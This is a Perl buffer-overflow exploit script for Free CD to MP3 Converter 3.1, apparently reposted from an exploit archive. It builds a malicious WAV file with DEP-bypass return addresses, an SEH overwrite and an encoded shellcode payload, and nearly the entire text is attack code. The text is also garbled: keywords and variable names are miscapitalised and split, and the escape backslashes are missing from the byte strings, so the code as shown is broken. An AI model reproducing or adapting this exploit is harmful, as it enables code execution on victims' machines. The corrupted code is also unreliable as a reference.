# Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Origianl exploit by C4SS! 0 running M3s:Http://www.exploit-db.com/exploits/15483/
# Modified by riusksk (Http://riusksk.blogbus.com)
# Test on Windows XP SP3 CN
# Data: 2010/11/20
#! /Usr/bin/perl
My $ Junk1 = A X 4112;
My $ Disabledep = "X68xdcxecx77";#0x77esp_68-push esp, pop ebp, ret 4, adjust ebp
$ Disabledep = $ Disabledep . "Xeax18x97x7c";# 0x7c9718ea-set eax to 1
$ Disabledep = $ Disabledep . "Xffxffxffxff";# Balance the stack
$ Disabledep = $ Disabledep . "X24xcdx93x7c";#0x7c93cd24-run NX Disable routine
$ Disabledep = $ Disabledep . "Xffxffxffxff";# Balance the stack
My $ Junk2 = B X 24;
My $ Nseh = "X90x90xebx06";# Jmp 06
My $ Seh = "X80x14x40x00";# Pop ret, no safeseh
My $ Nops = "X90x90";
My $ Shellcode =
"Xb8xc7xaex8exaexd9xc7x33xc9xb1x31xd9x74x24" .
"Xf4x5bx31x43x14x83xebxfcx03x43x10x25x5bx72" .
"X46x20xa4x8bx97x52x2cx6exa6x40x4axfax9bx54" .
"X18xaex17x1fx4cx5bxa3x6dx59x6cx04xdbxbfx43" .
"X95xeax7fx0fx55x6dxfcx52x8ax4dx3dx9dxdfx8c" .
"X7axc0x10xdcxd3x8ex83xf0x50xd2x1fxf1xb6x58" .
"X1fx89xb3x9fxd4x23xbdxcfx45x38xf5xf7xeex66" .
"X26x09x22x75x1ax40x4fx4dxe8x53x99x9cx11x62" .
"Xe5x72x2cx4axe8x8bx68x6dx13xfex82x8dxaexf8" .
"X50xefx74x8dx44x57xfex35xadx69xd3xa3x26x65" .
"X98xa0x61x6ax1fx65x1ax96x94x88xcdx1exeexae" .
"Xc9x7bxb4xcfx48x26x1bxf0x8bx8exc4x54xc7x3d" .
"X10xeex8ax2bxe7x63xb1x15xe7x7bxbax35x80x4a" .
"X31xdaxd7x53x90x9ex26xa5x29x0bxbex1fxd8x76" .
"Xa2xa0x36xb4xdbx22xb3x45x18x3axb6x40x64xfd" .
"X2ax39xf5x6bx4dxeexf6xbex3ex78x09";
Open($ Fp , "> Test.wav");
Print $ Fp $ Junk1 . $ Disabledep . $ Junk2 . $ Nseh . $ Seh . $ Nops . $ Shellcode;
Close $ Fp;
Test results: